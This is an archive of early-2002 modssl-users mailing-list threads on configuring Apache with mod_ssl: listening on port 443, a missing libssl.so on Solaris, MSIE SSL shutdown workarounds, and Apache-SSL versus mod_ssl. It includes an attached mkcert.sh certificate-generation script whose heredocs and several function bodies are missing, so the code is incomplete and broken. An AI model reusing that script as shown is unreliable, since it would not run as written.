"MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C1A37E.857AD130 Content-Type: text/plain; charset="iso-8859-1" Hi Laurie, To eliminate any confusion regarding configuration, can you pl. use the standard httpd.conf and the ssl.conf that's installed when 2.0.28 is installed.. The only extra thing you'll have to do is to create the certificate.. Incase you don't have any previousely created certs., you can use the attached script to generate dummy certs. Pl. note that this script is derived off Ralf's original script - let me know if you run into problems.. (to get help, just type "./mkcert.sh").. BTW, I believe you have to explicitly tell the server to listen on 443. -Madhu -----Original Message----- From: Laurie Young [mailto:laurie@wildfalcon.com] Sent: Tuesday, January 22, 2002 4:47 AM To: 'modssl-users@modssl.org' Subject: Re: Apache 2 + SSL Problems On Tue, 22 Jan 2002, Teodor Cimpoesu wrote: > Hi Laurie! > On Tue, 22 Jan 2002, Laurie Young wrote: > > > I have tried starting it with > > ./apachectrl start > > and with > > ./apachectrl startssl > > > > both give the same errors > > > > It would be good if someone could have a look at my httpd.config file, > > which I have included as an attachment > > > I don't remember if you said how did you compiled the SSL support (deleted > the mesgs) was it as a loadable module? If so, add a LoadModule directive, > cause: I had some problems with DSO (apxs insisted on producing .la files instead of .dso files) so I gave up on that and compilied modssl into the main apache binary > > > PidFile logs/httpd.pid > > Timeout 300 > > Listen 8080 > > Listen 443 > ....^ you listen on 443 either mod_ssl is loaded or not. I wasn't sure if I had to explicitly tel the server to listen to 443. Do I? > > > > .................^ virtual host where sslengine is on sais a different IP > than what you've tried from command line (namely 127.0.0.1 aka localhost). 146.169.4.13 is the real world IP for the machine I am running on, I have tried connecting to localhost, 127.0.0.1, 146.169.3.14 and stone.doc.ic.ac.uk (the FQDN of the host) but all have the same error ;-( Laurie -- ================================================== Laurie Robert Young laurie@wildfalcon.com | laurie@doc.ic.ac.uk www.wildfalcon.com | www.doc.ic.ac.uk/~laurie ICQ UIN #20194782 ================================================== ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ------_=_NextPart_000_01C1A37E.857AD130 Content-Type: application/octet-stream; name="mkcert.sh" Content-Disposition: attachment; filename="mkcert.sh" Content-Transfer-Encoding: quoted-printable #!/bin/sh ## ## mkcert.sh -- SSL Certificate Generation Utility ## export certdir=3D/opt/apache2s export PATH=3D$certdir/ssl/bin:$PATH ## Some local variables used openssl=3D`whence openssl` type=3D algo=3D crt=3D key=3D view=3D ## Terminal Sequences case $TERM in xterm|xterm*|vt220|vt220*) BB=3D`echo dummy | awk '{ printf("%c%c%c%c", 27, 91, 49, 109); }'` BE=3D`echo dummy | awk '{ printf("%c%c%c", 27, 91, 109); }'` ;; vt100|vt100*) BB=3D`echo dummy | awk '{ printf("%c%c%c%c%c%c", 27, 91, 49, 109, = 0, 0); }'` BE=3D`echo dummy | awk '{ printf("%c%c%c%c%c", 27, 91, 109, 0, 0); = }'` ;; default) BB=3D'' BE=3D'' ;; esac ## Utility Functions : function Usage { echo = "+---------------------------------------------------------------------+= "; echo "| = |"; echo "| USAGE = |"; echo "| = |"; echo "| Before you use the mod_ssl you should prepare the SSL = certificate |"; echo "| system by running the 'mkcert.sh' command. = |"; echo "| For different situations the following variants are provided: = |"; echo "| = |"; echo "| To view a certificate (displays the generated data) = |"; echo "| % mkcert.sh --view = |";=20 echo "| = |"; echo "| To generate a Client certificate (signed by own CA) = |"; echo "| % mkcert.sh --client = |";=20 echo "| = |"; echo "| To generate a custom CA certificate = |"; echo "| % mkcert.sh --ca = |";=20 echo "| = |"; echo "| To generate a custom certificate (signed by own CA) = |"; echo "| % mkcert.sh --custom = |";=20 echo "| = |"; echo "| To generate a dummy certificate (dummy self-signed Snake Oil = cert) |"; echo "| % mkcert.sh --dummy = |"; echo "| = |"; echo "| To generate a test certificate (test self-signed Snake Oil CA) = |"; echo "| % mkcert.sh --test = |"; echo "| = |"; echo "| Use type=3Ddummy when you're a vendor package maintainer, = |"; echo "| the type=3Dtest when you're an admin but want to do tests = only, |"; echo "| the type=3Dcustom when you're an admin willing to run a real = server |"; echo "| (The default is type=3Dtest) = |"; echo "| = |"; echo "| Additionally add --algo=3DRSA (default) or --algo=3DDSA to = select |"; echo "| the signature algorithm used for the generated certificate. = |"; echo "| = |"; echo "| Thanks for using Apache = |"; echo = "+---------------------------------------------------------------------+= "; exit 0 } function becho { echo "${BB}$1${BE}" } function perr { echo "${BB}$1${BE}" 1>&2 exit 1 } function desc_key_warning { echo "The contents of the $1 file (the generated private key) has" echo "to be kept secret. So we strongly recommend you to encrypt = the" echo "$1 file with a Triple-DES cipher and a Pass Phrase." } function desc_dsa_warning { echo "" echo "${BB}WARNING!${BE} You're generating DSA based = certificate/key" echo " pairs. This implies that RSA based ciphers won't be" echo " available later, which for your web server = currently" echo " still means that mostly all popular web browsers = cannot" echo " connect to it. At least not until you also generate = an" echo " additional RSA based certificate/key pair and = configure" echo " them in parallel." } function desc_server_certificate { echo "" becho "o $keydir/server.key" echo " The PEM-encoded $algo private key file which you = configure" echo " with the 'SSLCertificateKeyFile' directive (automatically = done" echo " when you install via APACI). ${BB}KEEP THIS FILE = PRIVATE!${BE}" echo "" becho "o $crtdir/server.crt" echo " The PEM-encoded X.509 certificate file which you = configure" echo " with the 'SSLCertificateFile' directive (automatically = done" echo " when you install via APACI)." echo "" } function desc_ca_certificate { echo "" becho "o $keydir/ca.key" echo " The PEM-encoded $algo private key file of the CA which = you can" echo " use to sign other servers or clients.\c" becho " KEEP THIS FILE PRIVATE!" echo "" becho "o $crtdir/ca.crt" echo " The PEM-encoded X.509 certificate file of the CA which = you use" echo " to sign other servers or clients. When you sign clients = with it" echo " (for SSL client authentication) you can configure this = file with" echo " the 'SSLCACertificateFile' directive." } function get_ca_csr { cat >.mkcert.cfg <.mkcert.cfg <.mkcert.cfg <.mkcert.serial fi if [ ".$algo" =3D .RSA ]; then $openssl x509 $extfile -days $days -CAserial .mkcert.serial \ -CA $crtdir/ca.crt -CAkey $keydir/ca.key \ -in $1 -req -out $2 else $openssl x509 $extfile -days $days -CAserial .mkcert.serial = \ -CA $crtdir/ca-dsa.crt -CAkey $keydir/ca-dsa.key = \ -in $1 -req -out $2 fi if [ $? -ne 0 ]; then perr "MKCERT: Failed to generate X.509 certificate" fi rm -f .mkcert.cfg } function gen_custom_ca { echo $LINE_SEP becho "STEP 1: Generating $algo private key for CA (1024 bit) = [ca.key]" gen_random_key $keydir/ca.key $keydir/ca.prm TRUE echo $LINE_SEP becho "STEP 2: Generating X.509 certificate signing request for CA = [ca.csr]" get_ca_csr gen_certificate_request $keydir/ca.key $crtdir/ca.csr echo $LINE_SEP becho "STEP 3: Generating X.509 certificate for CA signed by self = [ca.crt]" if [ ".$certversion" =3D .3 -o ".$certversion" =3D . ]; then extfile=3D"-extfile .mkcert.cfg" cat >.mkcert.cfg <$RANDFILE fi export RANDFILE # Extract parameters case "x$type" in x ) type=3Dtest ;; esac case "x$algo" in xRSA|xrsa )=20 algo=3DRSA ;; xDSA|xdsa )=20 algo=3DDSA=20 ;; x )=20 algo=3Dchoose ;; * ) perr "Unknown algorithm \'$algo' (use RSA or DSA!)" ;; esac # Processing case $type in dummy) echo "" becho "Generating self-signed Snake Oil certificate [DUMMY]" echo $LINE_SEP if [ ".$algo" =3D .choose ]; then algo=3DRSA fi if [ ".$algo" =3D .RSA ]; then if [ ! -f "$crtdir/server-rsa.crt" -a ! -f = "$keydir/server-rsa.key" ]; then echo "" echo "There are no dummy certificates loaded on your = system." echo "You can create certificates using the --custom = option." exit 1 fi cp $crtdir/server-rsa.crt $crtdir/server.crt (umask 077; cp $keydir/server-rsa.key $keydir/server.key) else if [ ! -f "$crtdir/server-dsa.crt" -a ! -f = "$keydir/server-dsa.key" ]; then echo "" echo "There are no dummy certificates loaded on your = system." echo "You can create certificates using the --custom = option." exit 1 fi cp $crtdir/server-dsa.crt $crtdir/server.crt (umask 077; cp $keydir/server-dsa.key $keydir/server.key) fi becho "RESULT: Server Certification Files" desc_server_certificate echo "WARNING: Do not use this for real-life/production systems" echo "" ;; ca) get_algorithm gen_custom_ca ;; test) echo "" becho "Generating test certificate signed by Snake Oil CA [TEST]" echo "WARNING: Do not use this for real-life/production systems" get_algorithm echo $LINE_SEP becho "STEP 1: Generating $algo private key(1024 bit) [server.key]" gen_random_key $keydir/server.key $keydir/ca-dsa.prm echo $LINE_SEP becho "STEP 2: Generating X.509 certificate signing request = [server.csr]" get_server_csr gen_certificate_request $keydir/server.key $crtdir/server.csr echo $LINE_SEP becho "STEP 3: Generating X.509 certificate signed by Snake Oil = CA\c" becho " [server.crt]" if [ ".$certversion" =3D .3 -o ".$certversion" =3D . ]; then extfile=3D"-extfile .mkcert.cfg" cat >.mkcert.cfg <.mkcert.cfg <.mkcert.cfg < from visp.engelschall.com id WAA25428; Tue, 22 Jan 2002 22:13:41 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id CEAA54CE745; Tue, 22 Jan 2002 22:13:39 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0MLDTR86691; Tue, 22 Jan 2002 22:13:29 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from linux1632.dn.net id VAA23936; Tue, 22 Jan 2002 21:42:34 +0100 (MET) Received: from cd58020a (CPE002078c70451.cpe.net.cable.rogers.com [24.112.104.96]) by linux1632.dn.net (8.12.0.Beta12/8.12.0.Beta12) with ESMTP id g0MKajaQ015875 for ; Tue, 22 Jan 2002 15:36:49 -0500 From: "Matt Goyer" To: Subject: Solaris + Apache Date: Tue, 22 Jan 2002 15:41:43 -0500 Message-ID: <00f801c1a385$368c0b50$6401a8c0@cd58020a> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Matt Goyer" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users When I try and start Apache 1.3.22 on Solaris 8 I get: bash-2.03# /usr/local/apache/bin/apachectl start ld.so.1: /usr/local/apache/bin/httpd: fatal: libssl.so.0: open failed: No such file or directory Killed Install commands (compiled w/gcc 3.0.3 from sunfreeware): cd mod_ssl-2.8.5-1.3.22 ./configure --with-apache=../apache_1.3.22 --with-ssl=/usr/local/ssl --enable-module=most --enable-shared=max --prefix=/usr/locale/apache Cd ../apache_1.3.22 Make Make certificate Make install I read through some of the old archives but nothing helped me solve this problem. Thanks, Matt ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 22:43:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA26472; Tue, 22 Jan 2002 22:42:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mx1.petsmart.com id WAA26465; Tue, 22 Jan 2002 22:42:00 +0100 (MET) Received: from mail.petsmart.com (chip.pasa.petsmart.com [10.2.1.75]) by mx1.petsmart.com (8.11.1/8.11.1) with SMTP id g0MLfvq00708 for ; Tue, 22 Jan 2002 13:41:57 -0800 Received: (qmail 28543 invoked by uid 104); 22 Jan 2002 21:41:57 -0000 Received: from sang@petsmart.com by mail; 22 Jan 2002 21:41:57 -0000 Received: from syi.pasa.petsmart.com (HELO syi) (shy2@10.2.1.171) by chip.pasa.petsmart.com with SMTP; 22 Jan 2002 21:41:55 -0000 Date: Tue, 22 Jan 2002 13:41:25 -0800 (PST) From: Sang Yi X-X-Sender: To: Subject: Re: Solaris + Apache In-Reply-To: <00f801c1a385$368c0b50$6401a8c0@cd58020a> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sang Yi X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users is your LD_LIBRARY_PATH set correctly? also, try uncommenting the line addmodule libssl.so in apache/src/Configuration.tmpl before the apache compile. good luck On Tue, 22 Jan 2002, Matt Goyer wrote: > When I try and start Apache 1.3.22 on Solaris 8 I get: > > bash-2.03# /usr/local/apache/bin/apachectl start > ld.so.1: /usr/local/apache/bin/httpd: fatal: libssl.so.0: open failed: > No such file or directory > Killed > > Install commands (compiled w/gcc 3.0.3 from sunfreeware): > > cd mod_ssl-2.8.5-1.3.22 > ./configure > --with-apache=../apache_1.3.22 > --with-ssl=/usr/local/ssl > --enable-module=most > --enable-shared=max > --prefix=/usr/locale/apache > Cd ../apache_1.3.22 > Make > Make certificate > Make install > > I read through some of the old archives but nothing helped me solve this > problem. > > Thanks, > Matt > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Jan 22 23:09:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA27794; Tue, 22 Jan 2002 23:08:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from emmy.tvdata.com id XAA27502; Tue, 22 Jan 2002 23:07:05 +0100 (MET) Received: from tvdata.com (tvdgauntlet.tvdata.com [172.19.10.23]) by emmy.tvdata.com (8.11.1/8.11.1) with SMTP id g0MM4IN15013 for ; Tue, 22 Jan 2002 17:04:19 -0500 (EST) Received: from SMTP agent by mail gateway Tue, 22 Jan 2002 17:02:54 -0500 Message-ID: <3C4DE224.5000306@tvdata.com> Date: Tue, 22 Jan 2002 17:05:24 -0500 From: Shain Miley User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:0.9.5) Gecko/20011027 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Solaris + Apache References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shain Miley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I would do a search for libssl.so and see what shows up. You may need to make a link from one version to another. For example: #locate libssl.so /usr/lib/libssl.so.0 /usr/lib/libssl.so.0.9.5 /usr/lib/apache/libssl.so [root@halley bin]# cd /usr/lib [root@halley lib]# ls -l libssl* lrwxrwxrwx 1 root root 15 May 21 2001 libssl.so.0 -> libssl.so.0.9.5* -rwxr-xr-x 1 root root 182680 Sep 30 2000 libssl.so.0.9.5* You may have the file libssl.so.X.X on your system and might just need to make a link to libssl.so.0 (ln -s). Hope this helps. Shain >is your LD_LIBRARY_PATH set correctly? >also, try uncommenting the line addmodule libssl.so in >apache/src/Configuration.tmpl before the apache compile. > >good luck > > >On Tue, 22 Jan 2002, Matt Goyer wrote: > >>When I try and start Apache 1.3.22 on Solaris 8 I get: >> >>bash-2.03# /usr/local/apache/bin/apachectl start >>ld.so.1: /usr/local/apache/bin/httpd: fatal: libssl.so.0: open failed: >>No such file or directory >>Killed >> >>Install commands (compiled w/gcc 3.0.3 from sunfreeware): >> >>cd mod_ssl-2.8.5-1.3.22 >>./configure >> --with-apache=../apache_1.3.22 >> --with-ssl=/usr/local/ssl >> --enable-module=most >> --enable-shared=max >> --prefix=/usr/locale/apache >>Cd ../apache_1.3.22 >>Make >>Make certificate >>Make install >> >>I read through some of the old archives but nothing helped me solve this >>problem. >> >>Thanks, >>Matt >> >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org >> > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 01:29:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA05324; Wed, 23 Jan 2002 01:28:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bubblehouse.divisionbyzero.com id BAA05304; Wed, 23 Jan 2002 01:27:17 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by bubblehouse.divisionbyzero.com (Postfix) with ESMTP id F379D5BD86 for ; Tue, 22 Jan 2002 17:37:10 -0800 (PST) Subject: Apache + mod_ssl + MSIE problems From: jon schatz To: modssl-users@modssl.org Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-tE4rtjzC3AB8hh9fREDi" X-Mailer: Evolution/1.0 (Preview Release) Date: 22 Jan 2002 16:27:46 -0800 Message-Id: <1011745666.21776.17.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-tE4rtjzC3AB8hh9fREDi Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Hi. I've got a server (apache 1.3.20 + modssl-2.8.4 + mod_perl-1.2.26) running on a linux machine. I've had problems with IE and ssl. I've got these magic lines in my conf file (inside my ssl virtual host container): SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 which should force apache/mod_ssl to use http/1.0 and allow unclean shutdowns for the ssl connection. except it doesn't. On closer inspection, my access log files contained the following (the first request is ssl, the second is plaintext): 192.168.1.120 - - [22/Jan/2002:15:54:15 -0800] "GET /library/library.css HTTP/1.1" 200 3327 <---snip----> 192.168.1.120 - - [22/Jan/2002:16:22:06 -0800] "GET /library/library.css HTTP/1.1" 304 - "http://devotchka.sonicopia.com:12345/maestro/home" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" My log format is correct, but just to make sure, i added the same log format entry into the ssl virtual host. still nothing. next, i wrote an apache module to dump my environment. accessing it from ssl shows that mod_perl is definitely aware of the HTTP_USER_AGENT env variable. but apache seems to be ignoring it, which causes the above regex not to work, which causes IE to fail, which leaves my boss very angry.=20 I tried this setup with the most current versions of openssl + apache, and the result was the same. i tried searching on google, but i just get pages and pages of RTFM's pointing to the above solution. my questions are as follows: 1) is this a mod_ssl bug or an apache bug? 2) has anyone else noted this behavior? 3) how can i set the above values unconditionally? the app i'm working on is IE specific anyway, so i don't need to worry about non-MS browsers. thanks... -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-tE4rtjzC3AB8hh9fREDi Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8TgOCwj1gFegse14RAqXRAJ4jFrsSVm3wGfvxyTHKggACRpFOKwCcChVU UcNVgDsPsOcPEcYA5uIuFQw= =AkE2 -----END PGP SIGNATURE----- --=-tE4rtjzC3AB8hh9fREDi-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 14:25:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA09161; Wed, 23 Jan 2002 14:24:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id OAA09137; Wed, 23 Jan 2002 14:23:46 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id D5B564CE539; Wed, 23 Jan 2002 14:23:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g0NDNEs00210; Wed, 23 Jan 2002 14:23:14 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web20401.mail.yahoo.com id LAA01421; Wed, 23 Jan 2002 11:54:03 +0100 (MET) Message-ID: <20020123105359.16015.qmail@web20401.mail.yahoo.com> Received: from [213.98.44.183] by web20401.mail.yahoo.com via HTTP; Wed, 23 Jan 2002 11:53:59 CET Date: Wed, 23 Jan 2002 11:53:59 +0100 (CET) From: =?iso-8859-1?q?Eduardo=20Fresno?= Subject: Apache and Mod_SSL To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?iso-8859-1?q?Eduardo=20Fresno?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I was wondering if you could help me on this issue. I'm trying to make Apache a secure server by adding SSL performance. There may exist two main ways to do it: 1) Mod_SSL 2) Apache-SSL I've tried out the first option, but during the process, I've been asked for the 'nmake' compiler. I don't have this compiler and I don't want to pay for it, as I think it is provided with Visual C++ ($$$). So I was wondering if there exist another way to make it. ?? If not, I'm thinking about using Apache-SSL instead of Mod_SSL, in spite of the fact that most people may prefer Mod_SSL. Is it worth using Apache-SSL instead of Mod_SSL? I mean, are there big differences between both two options? Which one is the best? Thanks in advance, -- Edd. _______________________________________________________________ Do You Yahoo!? Yahoo! Messenger Comunicación instantánea gratis con tu gente. http://messenger.yahoo.es ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 15:48:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA12833; Wed, 23 Jan 2002 15:47:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from plmler2.mail.eds.com id PAA12799; Wed, 23 Jan 2002 15:46:06 +0100 (MET) Received: from plmlir4.mail.eds.com (plmlir4-2.mail.eds.com [199.228.143.135]) by plmler2.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0NEk1l08347 for ; Wed, 23 Jan 2002 08:46:02 -0600 Received: from plmlir4.mail.eds.com (localhost [127.0.0.1]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0NEk0M28258 for ; Wed, 23 Jan 2002 08:46:00 -0600 (CST) Received: from usplm002.exch.eds.com (USPLM002.txpln.us.eds.com [198.132.135.7]) by plmlir4.mail.eds.com (8.11.6/8.11.3) with ESMTP id g0NEk0228254 for ; Wed, 23 Jan 2002 08:46:00 -0600 (CST) Received: by USPLM002.txpln.us.eds.com with Internet Mail Service (5.5.2655.51) id ; Wed, 23 Jan 2002 09:46:01 -0500 Message-ID: <8A87A19E6153D4119FA800508BDF0932E0E2A9@USHEM202> From: "Kuczborski, Carol L" To: "'modssl-users@modssl.org'" Subject: RE: Apache + mod_ssl + MSIE problems Date: Wed, 23 Jan 2002 09:45:54 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.51) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kuczborski, Carol L" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I had the same problem with most all versions of IE (5.0, 5.5, and 6.0), but not Netscape (4.75, 4.76, and 6). I received the "Page cannot be displayed" and "Cannot find server or DNS error" messages. I was running Apache and mod_ssl as packaged with the Oracle9i Application Server on a Windows NT platform. I did not completely eliminate the errors, but reduced them quite significantly by making the following changes: 1. Modified httpd.conf as follows: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown 2. Oracle Worldwide Support patched the ApacheModuleSSL.dll file. The patch to ApacheModuleSSL.dll implements a workaround in the code for reading from a socket for WIN32. According to the details for the ApacheModuleSSL.dll patch, there was mention of a bug in the "select" function in Windows NT 4.0: "When checking a socket, if data can be read without blocking, select () returns yes, but when actually reading from the socket with recv(), that function returns WSAEWOULDBLOCK, which says that reading would block. It seems that this problem does not occur in usual operation, but only in an SSL enabled Apache (modssl or apache-ssl) with https. The code for WIN32, which handles writing to a socket, already contains a workaround for this. The code for reading from a socket did not have a workaround." Basically, they added a retry loop so that if a read from the socket failed, it tried the read again. My suspicion is that Netscape does this on it's own and IE does not. Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: jon schatz [mailto:jon@divisionbyzero.com] Sent: Tuesday, January 22, 2002 7:28 PM To: modssl-users@modssl.org Subject: Apache + mod_ssl + MSIE problems Hi. I've got a server (apache 1.3.20 + modssl-2.8.4 + mod_perl-1.2.26) running on a linux machine. I've had problems with IE and ssl. I've got these magic lines in my conf file (inside my ssl virtual host container): SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 which should force apache/mod_ssl to use http/1.0 and allow unclean shutdowns for the ssl connection. except it doesn't. On closer inspection, my access log files contained the following (the first request is ssl, the second is plaintext): 192.168.1.120 - - [22/Jan/2002:15:54:15 -0800] "GET /library/library.css HTTP/1.1" 200 3327 <---snip----> 192.168.1.120 - - [22/Jan/2002:16:22:06 -0800] "GET /library/library.css HTTP/1.1" 304 - "http://devotchka.sonicopia.com:12345/maestro/home" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" My log format is correct, but just to make sure, i added the same log format entry into the ssl virtual host. still nothing. next, i wrote an apache module to dump my environment. accessing it from ssl shows that mod_perl is definitely aware of the HTTP_USER_AGENT env variable. but apache seems to be ignoring it, which causes the above regex not to work, which causes IE to fail, which leaves my boss very angry. I tried this setup with the most current versions of openssl + apache, and the result was the same. i tried searching on google, but i just get pages and pages of RTFM's pointing to the above solution. my questions are as follows: 1) is this a mod_ssl bug or an apache bug? 2) has anyone else noted this behavior? 3) how can i set the above values unconditionally? the app i'm working on is IE specific anyway, so i don't need to worry about non-MS browsers. thanks... -jon -- jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Jan 23 16:45:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA15096; Wed, 23 Jan 2002 16:44:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id QAA15087; Wed, 23 Jan 2002 16:43:45 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id 8C453CC9C2 for ; Wed, 23 Jan 2002 10:48:18 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id 1E7EC19B4; Wed, 23 Jan 2002 10:43:39 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <20020123105359.16015.qmail@web20401.mail.yahoo.com> X-Base: are belong to us. move zig for great justice. Date: Wed, 23 Jan 2002 10:43:38 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: RE: Apache and Mod_SSL Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 23-Jan-2002 Eduardo Fresno wrote: > I'm trying to make Apache a secure server by adding > SSL performance. There may exist two main ways to do > it: > 1) Mod_SSL > 2) Apache-SSL > > I've tried out the first option, but during the > process, I've been asked for the 'nmake' compiler. I > don't have this compiler and I don't want to pay for > it, as I think it is provided with Visual C++ ($$$). I presume by this you are trying to compile Apache with mod (or Apache-) SSL on Windows, right? I am not very familiar with attempting to use Apache with SSL on Windows, but I believe that it is set up only to compile with Microsoft Visual Studio (or Visual C++ or whatever M$ is calling it this week). > If not, I'm thinking about using Apache-SSL instead of > Mod_SSL, in spite of the fact that most people may > prefer Mod_SSL. > > Is it worth using Apache-SSL instead of Mod_SSL? > I mean, are there big differences between both two > options? Which one is the best? If I'm not mistaken mod-ssl is derived from Apache-SSL. I don't know what the main differences are. - Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream 